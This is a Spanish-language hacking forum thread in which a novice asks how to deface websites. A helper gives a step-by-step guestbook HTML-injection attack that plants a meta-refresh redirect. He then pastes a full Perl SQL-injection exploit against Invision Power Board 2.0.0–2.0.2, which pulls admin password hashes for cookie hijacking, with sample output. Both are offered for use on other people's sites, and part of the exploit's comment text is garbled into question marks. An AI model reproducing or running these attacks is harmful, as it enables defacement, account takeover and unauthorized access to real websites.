Alguien que me explique como desfacear desde cero porfa!!!!!!!!!!!!!!1

mm mira hay diferentes tipos de deface y muchas maneras de hacerlo mysql y demas como lo kieres desde cero te dejo un deface facilito para ke te vayas metriendo al mundo del deface sale Inyection HTML



lo dice, se trata de inyectar o anexar una línea de códigos en HTML.

Se utiliza para Libro de Visitas, Foros, TagBoard o cualquier servicio que permita
agregar mensajes y tenga habilitado la opción HTML.


Comencemos...

Haré un ejemplo de esta técnica con un Libro de Visitas, son los servicios más vulnerables
al Inyection HTML.


1º Entra al libro de visitas e intenta escribir algo.

2º Para darte si tu ataque será exitoso tendrás que darte cuenta si la opción HTML
esta activada.

3º Escribe lo siguiente: <h1>Prueba (En "Prueba" podrás escribir lo que quieras), lo
importante es que tienes que fijarte si esa palabra se agranda. Si esa palabra que
escribistes se pone grande, es vulnerable.

4º Ahora firma de nuevo y pon esta línea de códigos:

************************************************************************

<META HTTP-EQUIV="refresh" CONTENT="1; url=AQUI PONES LA URL DEL HACK">

************************************************************************

En la línea de códigos que ves arriba, en esta parte: url=AQUI PONES LA URL DEL HACK">
pondrás la dirección web a la que quieras que se redireccione.

Por ejemplo:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://elite-hackers.es.tl//">

Cuando entren al libro de visitas, se redireccionará a mi web -> elite hackers


Solo es cuestión de práctica y encontrar algunas web's vulnerables.

bueno bro espero te sirva este deface o inyeccion es uno de los mas faciles

Oyeme y que otras tecnicas html hay? o que otras existen algo asi para sql o para php ¿puedes explicarme algunas otras?

te puse la inyeccion html por ek es uno de los defaces mas faciles mira te dejo uno sql para ke veas la diferencia entre le nivel de cada uno el sql ya es mas dificil pero te lo pongo solo para ke des una idea
Este se hace mediante un xploit el de abajo .

Invision Power Board V2.0.0 - 2.0.2 SQL Inyection

Este es un xploit para los populares foros invision version v2.0.0 al 2.0.2, el xploit
esta escrito en perl.



----------COMIENZO----------



#!/usr/bin/perl
use IO::Socket;

Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
by RusH security team (www.rst.void.ru)
coded by 1dt.w0lf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
example:

r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
------------------------------------------------------------------------------------------------
[>] SERVER: 127.0.0.1
[>] DIR: /IPB202/
[>] FORUM: 2
[>] TOPIC: 1
[>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
[>] PREFIX:
[>] ID:
------------------------------------------------------------------------------------------------

[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!

PREFIX: ibf_

r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
------------------------------------------------------------------------------------------------
[>] SERVER: 127.0.0.1
[>] DIR: /IPB202/
[>] FORUM: 2
[>] TOPIC: 1
[>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
[>] PREFIX: ibf_
[>] ID:
------------------------------------------------------------------------------------------------

[~] PREPARE TO CONNECT...
[+] CONNECTED
[~] SENDING QUERY...
[+] DONE!

[ REPORT ]------------------------------------------------------------------------------------
MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
------------------------------------------------------------------------------------------------
Now you need edit cookie and insert new pass_hash and member_id values.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
???? ???? ? ???????????? ?????????? ??????????:
???????? pass_hash ??? ?? ????????????? ?????? ?????!!! ? ??????????? ????????
?? ?????? ? ??????? ???????? ????? ????? ?? ????? ??? ????? ?????? ???
????? ??????. member_id ??? ????? ??????????? ???????? ?? ??????. ??????? ??
????? ???????? ???????????? pass_hash =) ?????? ????????????????? ?? ?????? ?
???????? pass_hash ? member_id ? ????? cookie ?? ???? ?? ????????
??????? ?????? ??????.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


if (@ARGV < 5)
{
print "-------------------------------------------------------------------------\r\n";
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "usage:\r\n";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print "SERVER - server where IPB installed\r\n";
print "/DIR/ - IPB directory or / for no directory\r\n";
print "FORUM_NUM - number of existing forum\r\n";
print "TOPIC_NUM - number of existing topic\r\n";
print "SID - your session id\r\n";
print "[TABLE_PREFIX] - table prefix in database\r\n";
print "[USER_ID] - user id for exploiting\r\n\r\n";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

if (@ARGV < 6) { $get_table = 1; }

$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];

print "-----------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] FORUM: $fnum\r\n";
print "[>] TOPIC: $tnum\r\n";
print "[>] SID: $sid\r\n";
print "[>] PREFIX: $prefix\r\n";
print "[>] ID: $id\r\n";
print "-------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),
name,char(58),
member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20")"%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80") || die "[-]
CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

$suc =0;

if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n";
$suc = 1; }
}
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}

print "--[ REPORT ]---------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*)[^:]*)[a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2]
PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "------------------------------------------------------------------------------------------------\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and
member_id values.\r\n";
exit(); }
else { print "Exploit failed\r\n"; }



----------FIN----------


bien solo te lo dejo para ke kompares ke no hay ke kerer korrer sin saber caminar salu2

Men pues si esta bien dificil, no hay alguna forma de irlo aprendiendo mas despaciooooo.....

que tal si me das un manual o algo asi...............

mmm mira dime ke kieres aprender asi en concreto defacing todo o alguno en especial?????

PUES ME GUSTARIA APRENDER TODO EL DESFACING, EMPEZANDO DESDE CERO YA QUE PUES NO SE NADA DE ESO.........

es ke mira no tengo manuales asi de deface ni c como acerte un manual de dface global primero tienes ke aprender otras cosas como bugs xploits y asi demas cosas por ejemplo kieres defacear el foro para defacearlo primero tienes ke buskar y encontrar un bug eso seria una alternativa la otra es ke metas un exploit al foro y sakes la pass y la contraseña del admin y ke lo defacees u otra intentar hacer una inyeccion html sql o demas.

Ves como no se puede acer un manual de deface asi en seco son muchas partes para llegar a hacer un buen deface asi ke por ke no investigas un poco y cosillas ke no entiendas las posteas en el foro sale

Roten ya he aprendido cositas asi de como utilizar un xploit pero pues no se cuales utilizar para cada pagina respectivamente, de que manera podria analizar las paginas para saber que xploit debo utilizar....

por favor ayudame ,